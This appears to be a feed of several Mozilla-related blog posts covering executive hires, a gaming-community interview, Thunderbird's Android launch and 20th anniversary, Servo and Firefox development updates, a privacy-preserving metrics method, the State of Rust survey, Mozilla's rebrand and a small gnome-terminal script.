The Mozilla BlogMozilla welcomes new executive team members

I am excited to announce that three exceptional leaders are joining Mozilla to help drive the continued growth of Firefox and increase our systems and infrastructure capabilities. 

For Firefox, Anthony Enzor-DeMeo will serve as Senior Vice President of Firefox, and Ajit Varma will take on the role of our new Vice President of Firefox Product. Both bring with them a wealth of experience and expertise in building product organizations, which is critical to our ongoing efforts to expand the impact and influence of Firefox. 

The addition of these pivotal roles comes on the heels of a year full of changes, successes and celebrations for Firefox — leadership transitions, mobile growth, impactful marketing campaigns in both North America and Europe and the marking of 20 years of being the browser that prioritizes privacy and millions of people choose daily. 

As Firefox Senior Vice President, Anthony will oversee the entire Firefox organization and drive overall business growth. This includes supporting our back-end engineering efforts and setting the overall direction for Firefox. In his most recent role as Chief Product and Technology Officer at Roofstock, Anthony led the organization through a strategic acquisition that greatly enhanced the product offering. He also served as Chief Product Officer at Better, and as General Manager, Product, Engineering & Design at Wayfair. Anthony is a graduate of Champlain College in Vermont, and has an MBA from the Sloan School at MIT. 

In his role as Vice President of Firefox Product, Ajit will lead the development of the Firefox strategy, ensuring it continues to meet the evolving needs of current users, as well as those of the future. Ajit has years of product management experience from Square, Google, and most recently, Meta, where he was responsible for monetization of WhatsApp and overseeing Meta’s business messaging platform. Earlier in his career, he was a co-founder and CEO of Adku, a venture-funded recommendation platform that was acquired by Groupon. Ajit has a BS from the University of Texas at Austin. 

We are also adding to our infrastructure leadership. As Senior Vice President of Infrastructure, Girish Rao is responsible for Platform Services, AI/ML Data Platform, Core Services & SRE, IT Services and Security, spanning Corporate and Product technology and services. His focus is on streamlining tools and services that enable teams to deliver products efficiently and securely. 

Previously, Girish led the Platform Engineering and Operations team at Warner Bros Discovery for their flagship streaming product Max. Prior to that, he led various digital transformation initiatives at Electronic Arts, Equinix Inc and Cisco. Girish’s professional journey spans various market domains (OTT streaming, gaming, blockchain, hybrid cloud data center, etc) where he leveraged technology to solve large scale complex problems to meet customer and business outcomes.  

We are thrilled to add to our team leaders who share our passion for Mozilla, and belief in the principles of our Manifesto — that the internet is a vital public resource that must remain open, accessible, and secure, enriching individuals’ lives and prioritizing their privacy.

The post Mozilla welcomes new executive team members appeared first on The Mozilla Blog.

The Mozilla BlogJay-Ann Lopez, founder of Black Girl Gamers, on creating safe spaces in gaming

A person with braided hair and bold red lipstick rests their face on their hand, surrounded by a colorful grid background with gaming and heart icons.<figcaption class="wp-element-caption">Jay-Ann Lopez, founder of Black Girl Gamers, a group of 10,000+ black women around the world with a shared passion for gaming.</figcaption>

Here at Mozilla, we are the first to admit the internet isn’t perfect, but we know the internet is pretty darn magical. The internet opens up doors and opportunities, allows for human connection, and lets everyone find where they belong — their corners of the internet. We all have an internet story worth sharing. In My Corner Of The Internet, we talk with people about the online spaces they can’t get enough of, the sites and forums that shaped them, and what reclaiming the internet really looks like.

This month, we caught up with Jay-Ann Lopez, founder of Black Girl Gamers, a group of 10,000+ black women around the world with a shared passion for gaming. We talked to her about the internet rabbit holes she loves diving into (octopus hunting, anyone?), her vision for more inclusive digital spaces, and what it means to shape a positive online community in a complex industry.

What is your favorite corner of the internet? 

Definitely Black Girl Gamers! It’s a community-focused company and agency housing the largest network of Black women gamers. We host regular streams on Twitch, community game nights, and workshops that are both fun and educational—like making games without code or improving presentation skills. We’ve also established clear community guidelines to make it a positive, safe space, even for me as a founder. Some days, I’m just there as another member, playing and relaxing.

Why did you start Black Girl Gamers?

In 2005, I was gaming on my own and wondered where the other Black women gamers were. I created a gaming channel but felt isolated. So I decided to start a group, initially inviting others as moderators on Facebook. We’ve since grown into a platform that centers Black women and non-binary gamers, aiming not only to build a safe community but to impact the gaming industry to be more inclusive and recognize diverse gamers as a core part of the audience.

What is an internet deep dive that you can’t wait to jump back into?

I stumbled upon this video on octopuses hunting with fish, and it’s stayed on my mind! Animal documentaries are a favorite of mine, and I often dive into deep rabbit holes about ecosystems and how human activity affects wildlife. I’ll be back in the octopus rabbit hole soon, probably watching a mix of YouTube and TikTok videos, or wherever the next related article takes me.

What is the one tab you always regret closing?

Not really! I regret how long I keep tabs open more than closing them. They stick around until they’ve done their job, so there’s no regret when they’re finally gone.

What can you not stop talking about on the internet right now?

Lately, I’ve been talking about sustainable fashion—specifically how the fashion industry disposes of clothes by dumping them in other countries. I think of places like Ghana where heaps of our waste end up on beaches. Our consumer habits drive this, but we’re rarely mindful of what happens to clothes once we’re done with them. I’m also deeply interested in the intersection of fashion, sustainability, and representation in gaming.

What was the first online community you engaged with?

Black Girl Gamers was my first real community in the sense of regular interaction and support. I had a platform before that called ‘Culture’ for natural hair, which gained a following, but it was more about sharing content rather than having a true community feel. Black Girl Gamers feels like a true community where people chat daily, play together, and share experiences.

If you could create your own corner of the internet, what would it look like?

I’d want a space that combines community, education, and events with opportunities for growth. It would blend fun and connection with a mission to improve and equalize the gaming industry, allowing gamers of all backgrounds to feel valued and supported.

What articles and/or videos are you waiting to read/watch right now?

There’s a Vogue documentary that’s been on my watchlist for a while! Fashion and beauty are big passions of mine, so I’m looking forward to finding time to dive into it.

How has building a community for Black women gamers shaped your experience online as both a creator and a user?

Building Black Girl Gamers has shown me the internet’s positive side, especially in sharing culture and interests. But being in a leadership role in an industry that has been historically sexist and racist also means facing targeted harassment from people who think we don’t belong. The work I do brings empowerment, but there’s also a constant pushback, especially in the gaming space, which can make it challenging. It’s a dual experience—immensely rewarding but sometimes exhausting.


Jay-Ann Lopez is the award-winning founder of Black Girl Gamers, a community-powered platform advocating for diversity and inclusion while amplifying the voices of Black women. She is also an honorary professor at Norwich University of the Arts, a member and judge for BAFTA, and a sought-after speaker and entrepreneur.

In 2023, Jay-Ann was featured in British Vogue as a key player in reshaping the gaming industry and recognized by the Institute of Digital Fashion as a Top 100 Innovator. She speaks widely on diversity in entertainment, tech, fashion and beauty and has presented at major events like Adweek, Cannes Lion, E3, PAX East and more. Jay-Ann also curates content for notable brands including Sofar Sounds x Adidas, WarnerBros, SEGA, Microsoft, Playstation, Maybelline, and YouTube, and co-produces Gamer Girls Night In, the first women and non-Binary focused event that combines gaming, beauty and fashion.

The post Jay-Ann Lopez, founder of Black Girl Gamers, on creating safe spaces in gaming appeared first on The Mozilla Blog.

Mozilla ThunderbirdThunderbird for Android November 2024 Progress Report

The title reads "Thunderbird for Android November 2024 Progress Report' and has both the Thunderbird and K-9 Mail logos beneath it.

It’s been a while since our last update in August, and we’re glad to be back to share what’s been happening. Over the past few months, we’ve been fully focused on the Thunderbird for Android release, and now it’s time to catch you up. In this update, we’ll talk about how the launch went, the improvements we’ve made since then, and what’s next for the project.

A Milestone Achieved

Launching Thunderbird for Android has been an important step in extending the Thunderbird ecosystem to mobile users. The release went smoothly, with no hiccups during the Play Store review process, allowing us to deliver the app to you right on schedule.

Since its launch a month ago, the response has been incredible. Hundreds of thousands of users have downloaded Thunderbird for Android, offering encouragement and thoughtful feedback. We’ve also seen an influx of contributors stepping up to make their mark on the project, with around twenty people making their first contribution to the Thunderbird for Android and K-9 Mail repository since 8.0b1. Their efforts, along with your support, continue to inspire us every day.

Listening to Feedback

When we launched, we knew there were areas for improvement. As we’ve been applying our updates to both K-9 Mail and Thunderbird for Android, it won’t magically have all the bugs fixed with a new release over night. We’ve been grateful for the feedback in the beta testing group and the reviews, but also especially excited about those of you who spent a moment to appreciate by leaving a positive review. Your feedback has helped us focus on key issues like account selection, notifications, and app stability.

For account selection, the initial design used two-letter abbreviations from domain names, which worked for many users but caused confusion for users managing many similar accounts. A community contributor updated this to use letters from account names instead. We’re now working on adding custom icons for more personalization while keeping simple options available. Additionally, we resolved the confusing dynamic reordering of accounts, keeping them fixed while clearly indicating the active one.

Notifications have been another priority. Gmail users on K-9 faced issues due to new requirements from Google, which we’re working on. As a stop gap we’ve added a support article which will also be in the login flow from 8.2 onwards. Others have had trouble setting up push notifications or emails not arriving immediately, which you can read more about as well. Missed system error alerts have also been a problem, so we’re planning to bring notifications into the app itself in 2025, providing a clearer way to address actions.

There are many smaller issues we’ve been looking at, also with the help of our community, and we look forward to making them available to you.

Addressing Stability

App stability is foundational to any good experience, and we regularly look at the data Google provides to us. When Thunderbird for Android launched, the perceived crash rate was alarmingly high at 4.5%. We found that many crashes occurred during the first-time user experience. With the release of version 8.1, we implemented fixes that dramatically reduced the crash rate around 0.4%. The upcoming 8.2 update will bring that number down further.

The Year Ahead

The mobile team at MZLA is heading into well deserved holidays a bit early this year, but next year we’ll be back with a few projects to keep you productive while reading email on the go. Our mission is for you to fiddle less with your phone. If we can reduce the time you need between reading emails and give you ways to focus on specific aspects of your email, we can help you stay organized and make the most of your time. We’ll be sharing more details on this next year.

While we’re excited about these plans, the success of Thunderbird for Android wouldn’t be possible without you. Whether you’re using the app, contributing code, or sharing your feedback, your involvement is the lifeblood of this project.

If K-9 Mail or Thunderbird for Android has been valuable to you, please consider supporting our work with a financial contribution. Thunderbird for Android relies entirely on user funding, and your support is essential to ensure the sustainability of open-source development. Together, we can continue improving the app and building a better experience for everyone.

The post Thunderbird for Android November 2024 Progress Report appeared first on The Thunderbird Blog.

Don Martirun a command in a tab with gnome-terminal

To start a command a new tab, use the --tab command-line option to gnome-terminal, along with -- to separate the gnome-terminal options from the options passed to the commnd being run.

The script for previewing this site locally uses separate tabs for the devd process and for the script that re-runs make when a file changes.

#!/usr/bin/bash set -e trap popd EXIT pushd $PWD cd $(dirname "$0") run_in_tab () { gnome-terminal --tab -- $* } make cleanhome # remove indexes, home page, feeds make -j run_in_tab devd --port 8088 public run_in_tab code/makewatch -j pages

More: colophon

Bonus links

Deepfake YouTube Ads of Celebrities Promise to Get You ‘Rock Hard’ YouTube is running hundreds of ads featuring deepfaked celebrities like Arnold Schwarzenegger and Sylvester Stallone hawking supplements that promise to help men with erectile dysfunction. Related LinkedIn post from Jérôme Segura at Malwarebytes: In the screenshot below, we see an ad for eBay showing the https website for the real eBay site. Yet, this ad is a fake.

How DraftKings, FanDuel, Legal Sports Betting Changed the U.S., The App Always Wins (Not just a Google thing. Win-lose deals are becoming more common as a percentage of total interactions in the market. More: personal AI in the rugpull economy)

I can now run a GPT-4 class model on my laptop I’m so excited by the continual efficiency improvements we’re seeing in running these impressively capable models. In the proprietary hosted world it’s giving us incredibly cheap and fast models like Gemini 1.5 Flash, GPT-4o mini and Amazon Nova. In the openly licensed world it’s giving us increasingly powerful models we can run directly on our own devices. (Openly licensed in this context means, in comparison to API access, you get predictable pricing and no surprise nerfing. More: generative ai antimoats)

$700bn delusion: Does using data to target specific audiences make advertising more effective? Latest studies suggest not We can improve the quality of our targeting much better by just buying ads that appear in the right context, than we can by using my massive first party database to drive the buy, and it’s way cheaper to do that. Putting ads in contextually relevant places beats any form of targeting to individual characteristics. Even using your own data. (This makes sense—if the targeting data did increase return on ad spend, then the price of the data and targeting-related services would tend to go up to capture any extra value.)

Defining AI I think we should shed the idea that AI is a technological artifact with political features and recognize it as a political artifact through and through. AI is an ideological project to shift authority and autonomy away from individuals, towards centralized structures of power.

U.S. Officials Urge Americans to Use Encrypted Apps, for Texting and Calls, in Wake of Chinese Infiltration of Our Unencryped Telecom Network (Switch from SMS to Signal is fairly common advice—the surprising part here is the source.)

Talking shit Why are people not developing a resistance to bullshit artists?

The Servo BlogThis month in Servo: :is(), :where(), grid layout, parallel flexbox, and more!

Servo nightly showing new support for CSS grid layout, when enabled via `layout.grid.enabled`

Servo now supports :is() and :where() selectors (@mrobinson, #34066), parallel layout for flexbox (@mrobinson, #34132), and experimentally, CSS grid layout (@nicoburns, @taniishkaa, #32619, #34352, #34421)! To try our new grid layout support, run Servo with --pref layout.grid.enabled.

We’ve added support for two key Shadow DOM interfaces, the shadowRoot property on Element (@simonwuelker, #34306) and the innerHTML property on ShadowRoot (@simonwuelker, #34335).

We’ve also landed ‘justify-self’ on positioned elements (@chickenleaf, #34235), form submission with <input type=image> (@shanehandley, #34203), DataTransfer (@Gae24, #34205), the close() method on ImageBitmap (@simonwuelker, #34124), plus several new SubtleCrypto API features:

On OpenHarmony, we’ve landed keyboard input and the IME (@jschwe, @jdm, @mukilan, #34188), touch fling gestures (@jschwe, @mrobinson, #33219), and additional CJK fallback fonts (@jschwe, #34410). You can now build for OpenHarmony on a Windows machine (@jschwe, #34113), and build errors have been improved (@jschwe, #34267).

More engine changes

You can now scroll the viewport and scrollable elements with your pointer anywhere in the area, not just when hovering over actual content (@mrobinson, @mukilan, #34347). --unminify-js, a very useful feature for diagnosing Servo bugs in real websites, now supports module scripts (@jdm, #34206).

We’ve fixed the behaviour of offsetLeft and offsetTop relative to <body> with ‘position: static’ (@nicoburns, @Loirooriol, #32761), which also required spec changes (@nicoburns, @Loirooriol, w3c/csswg-drafts#10549). We’ve also fixed several layout bugs around:

The getClientRects() method on Element now correctly returns a DOMRectList (@chickenleaf, #34025).

Stylo has been updated to 2024-11-01 (@Loirooriol, #34322), and we’ve landed some changes to prepare our fork of Stylo for publishing releases on crates.io (@mrobinson, @nicoburns, #34332, #34353). We’ve also made more progress towards splitting up our massive script crate (@jdm, @sagudev, #34357, #34356, #34163), which will eventually allow Servo to be built (and rebuilt) much faster.

Performance improvements

In addition to parallel layout for flexbox (@mrobinson, #34132), we’ve landed several other performance improvements:

We’ve also landed some changes to reduce Servo’s binary size:

Servo’s tracing-based profiling support (--features tracing-perfetto or tracing-hitrace) now supports filtering events via an environment variable (@delan, #34236, #34256), and no longer includes events from non-Servo crates by default (@delan, #34209). Note that when the filter matches some span or event, it will also match all of its descendants for now, but this is a limitation we intend to fix.

Most of the events supported by the old interval profiler have been ported to tracing (@delan, #34238, #34337). ScriptParseHTML and ScriptParseXML events no longer count the time spent doing layout and script while parsing, reducing them to more realistic times (@delan, #34273), while ScriptEvaluate events now count the time spent running scripts in timers, DOM event listeners, and many other situations (@delan, #34286), increasing them to more realistic times.

We’ve added new tracing events for display list building (@atbrakhi, #34392), flex layout, inline layout, and font loading (@delan, #34392). This will help us diagnose performance issues around things like caching and relayout for ‘stretch’ in flex layout, shaping text runs, and font template creation.

For developers

Hacking on Servo is now easier, with our new --profile medium build mode in Cargo (@jschwe, #34035). medium is more optimised than debug, but unlike release, it supports debuggers, line numbers in backtraces, and incremental builds.

Servo now uses CODEOWNERS to list reviewers that are experts in parts of our main repo. This should make it much easier to find reviewers that know how to review your code, and helps us maximise the quality of our code reviews by allowing reviewers to specialise.

Donations

Thanks again for your generous support! We are now receiving 4291 USD/month (+2.1% over October) in recurring donations. We are no longer accepting donations on LFX — if you were donating there, please move your recurring donations to GitHub or Open Collective.

Servo is also on thanks.dev, and already fifteen GitHub users that depend on Servo are sponsoring us there. If you use Servo libraries like url, html5ever, selectors, or cssparser, signing up for thanks.dev could be a good way for you (or your employer) to give back to the community.

4291 USD/month
10000

With this money, we’ve been able to cover our web hosting and self-hosted CI runners for Windows and Linux builds. When the time comes, we’ll also be able to afford macOS runners and perf bots, as well as additional Outreachy interns next year! As always, use of these funds will be decided transparently in the Technical Steering Committee. For more details, head to our Sponsorship page.

Conferences and blogs

Mozilla ThunderbirdCelebrating 20 Years of Thunderbird: Independence, Innovation and Community

Thunderbird turns 20 today. Such a huge milestone invites reflection on the past and excitement for the future. For two decades, Thunderbird has been more than just an email application – it has been a steadfast companion to millions of users, offering communication, productivity, and privacy.

20 Years Ago Today…

Thunderbird’s journey began in 2003, but version 1.0 was officially released on December 7, 2004. It started as an offshoot of the Mozilla project and was built to challenge the status quo – providing an open-source, secure and customizable alternative to proprietary email clients. What began as a small, humble project soon became the go-to email solution for individuals and organizations who valued control over their data. Thunderbird was seen as the app for those in the ‘know’ and carved a unique space in the digital world.

Two Decades of Ups and Downs and Ups

The path hasn’t always been smooth. Over the years, Thunderbird faced its share of challenges – from the shifting tides of technology and billion dollar competitors coming on the scene to troubles funding the project. In 2012, Mozilla announced that support for Thunderbird would end, leaving the project largely to fend for itself. Incredibly, a passionate group of developers, users, and supporters stepped up and refused to let it fade away. Twenty million people continued to rely on Thunderbird, believing in its potential, rallying behind it, and transforming it into a project fueled by its users, for its users.

In 2017, the Mozilla Foundation, which oversaw Thunderbird along with a group of volunteers in the Thunderbird Council, once again hired a small 3 person team to work on the project, breathing new life into its development. This team decided to take matters into their own hands and let the users know through donation appeals that Thunderbird needed their support. The project began to regain strength and momentum and Thunderbird once again came back to life. (More on this story can be found in our previous post, “The History of Thunderbird.”)

The past few years, in particular, have been pivotal. Thunderbird’s user interface got a brand new facelift with the release of Supernova 115 in 2023.  The 2024 Nebula release fixed a lot of the back-end code and technical debt that was plaguing faster innovation and development.  The first-ever Android app launched, extending Thunderbird to mobile users and opening a new chapter in its story. The introduction of Thunderbird Pro Services, including tools like file sharing and appointment booking, signals how the project is expanding to become a comprehensive productivity suite. And with that, Thunderbird is gearing up for the next era of growth and relevance.

Thank You for 20 Amazing Years

As we celebrate this milestone, we want to thank you. Whether you’ve been with Thunderbird since its earliest days or just discovered it recently, you’re part of a global movement that values privacy, independence, and open-source innovation. Thunderbird exists because of your support, and with your continued help, it will thrive for another 20 years and beyond.

Here’s to Thunderbird: past, present, and future. Thank you for being part of the journey. Together, let’s build what’s next.

Happy 20th, Thunderbird!

20 Years of Thunderbird Trivia!

It Almost Had a Different Name

Before Thunderbird was finalized, the project was briefly referred to as “Minotaur.” However, that name didn’t stick, and the team opted for something more dynamic and fitting for its vision.

Beloved By Power Users

Thunderbird has been a favorite among tech enthusiasts, system administrators, and privacy advocates because of its extensibility. With add-ons and customizations, users can tweak Thunderbird to do pretty much anything.

Supports Over 50 Languages

Thunderbird is loved world-wide! The software is available in more than 50 languages, making it accessible to users all across the globe.

Launched same year as Gmail

Thunderbird and Gmail both launched in 2004. While Gmail revolutionized web-based email, Thunderbird was empowering users to manage their email locally with full control and customization.

Donation-Driven Independence

Thunderbird relies entirely on user donations to fund its development. Remarkably, less than 3% of users donate, but their generosity is what keeps the project alive and independent for the other 97% of users.

Robot Dog Regeneration

The newly launched Thunderbird for Android is actually the evolution of the K-9 Mail project, which was acquired by Thunderbird in 2022. It was smarter to work with an existing client who shared the same values of open source, respecting the user, and offering customization and rich feature options.

The post Celebrating 20 Years of Thunderbird: Independence, Innovation and Community  appeared first on The Thunderbird Blog.

Data@MozillaHow do we preserve the integrity of business metrics while safeguarding our users privacy choice?

Abstract. Respecting our user’s privacy choices is at the top of our priorities and it also involves the deletion of their data from our Data Warehouse (DHW) when they request us to do so. For Analytics Engineering, this deletion presents the challenge to maintain business metrics reliable and stable along with the evolution of business analyses. This blog describes our approach to break through this challenge. Reading time: ~5 minutes.


Mozilla has a strong commitment to protecting user privacy and giving each user control over the information that they share with us. When the user’s choice is to opt-out of sending telemetry data, the browser sends a request that results in the deletion of the user’s records from our Data Warehouse. We call this process Shredder. The impact of Shredder is problematic when the reported key performance indicators (KPIs) and Forecasts change after a reprocess or “backfill” of data. This is a limitation to our analytics capabilities and the evolution of our products. Yet, running a backfill is a common process that remains essential to expand our business understanding, so the question becomes: how do we rise to this challenge? Shredder Mitigation is a strategy that breaks through this problem and resolves the impact in business metrics. Let’s see how it works with a simplified example. A table “installs” in the DWH contains telemetry data including the install id, browser and  channel utilized on given dates.

installs

date install_id browser channel
2021-01-01 install-1 Firefox Release
2021-01-01 install-2 Fenix Release
2021-01-01 install-3 Focus Release
2021-01-01 install-4 Firefox Beta
2021-01-01 install-5 Fenix Release

Derived from this installs table, there is an aggregate that stores the metric “kpi_installs”, which allows us to understand the usage per browser over time and improve accordingly, and that doesn’t contain any ID or channel information.

installs_aggregates_v1

date browser kpi_installs
2021-01-01 Firefox 2
2021-01-01 Fenix 2
2021-01-01 Focus 1
Total   5

  What happens when install-3 and install-5 opt-out of sending telemetry data and we need to backfill? This event results in the browser sending a deletion request, which Mozilla’s Shredder process addresses by deleting existing records of these installs along the DWH. After this deletion, the business asks us if it’s possible to calculate kpi_installs split by channel, to evaluate beta, nightly and release separately. This means that the channel needs to be added to the aggregate and the data be backfilled to recalculate the KPI. With install-3 and install-5 deleted, the backfill will report a reduced -thus, unstable- value for kpi_installs due to Shredder’s impact.

installs_aggregates (without shredder mitigation)

date browser channel kpi_installs
2021-01-01 Firefox Release 2
2021-01-01 Fenix Release 1
Total     3

  How do we solve this problem? The Shredder Mitigation process safely executes the backfill of the aggregate by recalculating the KPI using only the combination of previous and new aggregates data and queries, identifying the difference in metrics due to Shredder’s deletions and storing this difference as NULL. The process runs efficiently for terabytes of data, ensuring a 100% stability in reported metrics and avoiding unnecessary costs by running automated data checks for each subset backfilled. Every version of our aggregates that use Shredder Mitigation is reviewed to not contain any dimensions that could be used to identify previously deleted records. The result of a backfill with shredder mitigation in our example, is a new version of the aggregate that incorporates the requested dimension “channel” and matches the reported version of the KPI:

installs_aggregates_v2

browser channel kpi_installs
Firefox Release 1
Firefox Beta 1
Fenix Release 1
Fenix NULL 1
Focus NULL 1
Total   5

With the reported metrics stable and consistent, the shredder mitigation process enables the business to safely evolve, generating knowledge in alignment with our data protection policies and safeguarding our users’ privacy choice. Want to learn more? Head over to the shredder process technical documentation for a detailed implementation guide and hands-on insights.

Firefox NightlyLearning and Improving Every Day – These Weeks in Firefox: Issue 173

Highlights

Friends of the Firefox team

Resolved bugs (excluding employees)

Volunteers that fixed more than one bug

  • Abhijeet Chawla[:ff2400t]

New contributors (🌟 = first patch)

 

Project Updates

Add-ons / Web Extensions

WebExtension APIs
WebExtensions Framework
    • Fixed a tabs events regression on extensions-created tabs with a tab url that uses an unknown protocol (e.g. extension-registered protocol handler) – Bug 1921426
  • Thanks to John Bieling for reporting and fixing this regression
Addon Manager & about:addons
  • In the extensions panel, a new messagebar has been introduced to let users know when an extension has been disabled through the blocklist (for add-ons of type extensions disabled by either a hard or soft block) – Bug 1917848

DevTools

DevTools Toolbox

Fluent

Lint, Docs and Workflow

  • The test-manifest-toml linter has now been added to CI. This may show up in code reviews, and typically reports issues like not using double quotes, separating skip-if conditions to multiple lines, ordering of tests in a file.

Migration Improvements

 

Picture-in-Picture

  • Thanks to florian for removing an unused call to Services.telemetry.keyedScalarAdd (bug 1932090), as a part of the effort to remove legacy telemetry scalar APIs (bug 1931901)
  • Also thanks to emilio for updating the PiP window to use outerHeight and outerWidth (bug 1931747), providing better compatibility for rounded PiP window corners and shadows on Windows

Search and Navigation

  • Address bar revamp (aka Scotch Bonnet project)
    • Dale disabled “interventions” results in address bar when new Quick Actions are enabled Bug 1794092
    • Dale re-enabled the Contextual Search feature Bug 1930547
    • Yazan changed Search Mode to not stick unless search terms are persisted, to avoid accidentally searching for URLs Bug 1923686
    • Daisuke fixed a problem where confirming an autofilled search keyword did not enable Search Mode Bug 1925532 
    • Daisuke made the Unified Search Button panel pick theme colors Bug 1930190
    • Daisuke improved keyboard navigation in and out of the Unified Search Button Bug 1930492, Bug 1931765
    • Emilio fixed regressions in the Address Bar alignment when the browser is full-screen Bug 1930499, and when the window is not focused Bug 1932652 
  • Search Service
  • Suggest

The Rust Programming Language BlogLaunching the 2024 State of Rust Survey

It’s time for the 2024 State of Rust Survey!

Since 2016, the Rust Project has collected valuable information and feedback from the Rust programming language community through our annual State of Rust Survey. This tool allows us to more deeply understand how the Rust Project is performing, how we can better serve the global Rust community, and who our community is composed of.

Like last year, the 2024 State of Rust Survey will likely take you between 10 and 25 minutes, and responses are anonymous. We will accept submissions until Monday, December 23rd, 2024. Trends and key insights will be shared on blog.rust-lang.org as soon as possible.

We invite you to take this year’s survey whether you have just begun using Rust, you consider yourself an intermediate to advanced user, or you have not yet used Rust but intend to one day. Your responses will help us improve Rust over time by shedding light on gaps to fill in the community and development priorities, and more.

Once again, we are offering the State of Rust Survey in the following languages (if you speak multiple languages, please pick one). Language options are available on the main survey page:

  • English
  • Simplified Chinese
  • French
  • German
  • Japanese
  • Russian
  • Spanish

Note: the non-English translations of the survey are provided in a best-effort manner. If you find any issues with the translations, we would be glad if you could send us a pull request to improve the quality of the translations!

Please help us spread the word by sharing the survey link via your social media networks, at meetups, with colleagues, and in any other community that makes sense to you.

This survey would not be possible without the time, resources, and attention of members of the Survey Working Group, the Rust Foundation, and other collaborators. We would also like to thank the following contributors who helped with translating the survey (in no particular order):

  • @albertlarsan68
  • @GuillaumeGomez
  • @Urgau
  • @Jieyou Xu
  • @llogiq
  • @avrong
  • @YohDeadfall
  • @tanakakz
  • @ZuseZ4
  • @igaray

Thank you!

If you have any questions, please see our frequently asked questions.

We appreciate your participation!

Click here to read a summary of last year's survey findings.

The Mozilla BlogReclaim the internet: Mozilla’s rebrand for the next era of tech

A stylized green flag on a black background, with the flag represented by a vertical line and a partial rectangle, and the "3" depicted with angular, geometric shapes.

Mozilla isn’t just another tech company — we’re a global crew of activists, technologists and builders, all working to keep the internet free, open and accessible. For over 25 years, we’ve championed the idea that the web should be for everyone, no matter who you are or where you’re from. Now, with a brand refresh, we’re looking ahead to the next 25 years (and beyond), building on our work and developing new tools to give more people the control to shape their online experiences. 

“As our personal relationships with the internet have evolved, so has Mozilla’s, developing a unique ability to meet this moment and help people regain control over their digital lives,” said Mark Surman, president of Mozilla. “Since open-sourcing our browser code over 25 years ago, Mozilla’s mission has been the same – build and support technology in the public interest, and spark more innovation, more competition and more choice online along the way. Even though we’ve been at the forefront of privacy and open source, people weren’t getting the full picture of what we do. We were missing opportunities to connect with both new and existing users. This rebrand isn’t just a facelift — we’re laying the foundation for the next 25 years.”

We teamed up with global branding powerhouse Jones Knowles Ritchie (JKR) to revamp our brand and revitalize our intentions across our entire ecosystem. At the heart of this transformation is making sure people know Mozilla for its broader impact, as well as Firefox. Our new brand strategy and expression embody our role as a leader in digital rights and innovation, putting people over profits through privacy-preserving products, open-source developer tools, and community-building efforts.

The Mozilla brand was developed with this in mind, incorporating insights from employees and the wider Mozilla community, involving diverse voices as well as working with specialists to ensure the brand truly represented Mozilla’s values while bringing in fresh, objective perspectives.

We back people and projects that move technology, the internet and AI in the right direction. In a time of privacy breaches, AI challenges and misinformation, this transformation is all about rallying people to take back control of their time, individual expression, privacy, community and sense of wonder. With our “Reclaim the Internet” promise,  a strategy built with DesignStudio in 2023,  the new brand empowers people to speak up, come together and build a happier, healthier internet — one where we can all shape how our lives, online and off, unfold. 

A close-up of a black hoodie with "Mozilla" printed in vibrant green, showcasing a modern and bold typeface.
A set of three ID badges with minimalist designs, each featuring a stylized black flag logo, a name, title, and Mozilla branding on green, black, or white backgrounds. The lanyards have "Mozilla" printed in bold text.

“The new brand system, crafted in collaboration with JKR’s U.S. and UK studios, now tells a cohesive story that supports Mozilla’s mission,” said Amy Bebbington, global head of brand at Mozilla. “We intentionally designed a system, aptly named ‘Grassroots to Government,’ that ensures the brand resonates with our breadth of audiences, from builders to advocates, changemakers to activists. It speaks to grassroots coders developing tools to empower users, government officials advocating for better internet safety laws, and everyday consumers looking to reclaim control of their digital lives.”

A large stage presentation with a bold black backdrop featuring oversized white typography and vibrant portraits of diverse individuals set against colorful blocks. The Mozilla flag logo is displayed in the top left, with "©2025 Mozilla Corporation" on the right. A presenter stands on the stage, emphasizing a modern, inclusive, and impactful design aesthetic.
A dynamic collage of Mozilla-branded presentation slides and visuals, showcasing a mix of graphs, headlines, diverse portraits, and key messaging. Themes include "Diversity & Inclusion," "Trustworthy AI," and "Sustainability," with bold typography, a structured grid layout, green accents, and the stylized flag logo prominently featured.

This brand refresh pulls together our expanding offerings, driving growth and helping us connect with new audiences in meaningful ways. It also funnels resources back into the  research and advocacy that fuel our mission.

  • The flag symbol highlights our activist spirit, signifying a commitment to ‘Reclaim the Internet.’ A symbol of belief, peace, unity, pride, celebration and team spirit—built from the ‘M’ for Mozilla and a pixel that is conveniently displaced to reveal a wink to its iconic Tyrannosaurus rex symbol designed by Shepard Fairey. The flag can transform into a more literal interpretation as its new mascot in ASCII art style, and serve as a rallying cry for our cause.
  • The bespoke wordmark is born of its semi-slab innovative typeface with its own custom characters. It complements its symbol and is completely true to Mozilla.
  • The colors start with black and white — a no-nonsense, sturdy base, with a wider green palette that is quintessential with nature and nonprofits that make it their mission to better the world, this is a nod to making the internet a better place for all.
  • The custom typefaces are bespoke and an evolution of its Mozilla slab serif today. It stands out in a sea of tech sans. The new interpretation is more innovative and built for its tech platforms. The sans brings character to something that was once hard working but generic. These fonts are interchangeable and allow for a greater degree of expression across its brand experience, connecting everything together.
  • Our new unified brand voice makes its expertise accessible and culturally relevant, using humor to drive action.
  • Icons inspired by the flag symbol connect to the broader identity system. Simplified layouts use a modular system underpinned by a square pixel grid.

“Mozilla isn’t your typical tech brand; it’s a trailblazing, activist organization in both its mission and its approach,” said Lisa Smith, global executive creative director at JKR. “The new brand presence captures this uniqueness, reflecting Mozilla’s refreshed strategy to ‘reclaim the internet.’ The modern, digital-first identity system is all about building real brand equity that drives innovation, acquisition and stands out in a crowded market.”

Our transition to the new brand is already underway, but we’re not done yet. We see this brand effort as an evolving process that we will continue to build and iterate on over time, with all our new efforts now aligned to this refreshed identity. This evolution brings advancements in AI, product growth and support for groundbreaking ventures. Stay tuned for upcoming campaigns and find out more at www.mozilla.org/en-US/

Curious to learn more about this project or JKR? Head over to www.jkrglobal.com

The word "Mozilla" displayed in bold, modern black typography on a white background, aligned with a precise grid system that emphasizes balance and structure.

The post Reclaim the internet: Mozilla’s rebrand for the next era of tech appeared first on The Mozilla Blog.

Hacks.Mozilla.OrgIntroducing Uniffi for React Native: Rust-Powered Turbo Modules

Today Mozilla and Filament are releasing Uniffi for React Native, a new tool we’ve been using to build React Native Turbo Modules in Rust, under an open source license. This allows millions of developers writing cross-platform React Native apps to use Rust  – a modern programming language known for its safety and performance benefits to build single implementations of their app’s core logic to work seamlessly across iOS and Android. 

This is a big win for us and for Filament who co-developed the library with Mozilla and James Hugman, the lead developer. We think it will be awesome for many other developers too. Less code is good. Memory safety is good. Performance is good. We get all three, plus the joy of using a language we love in more places.

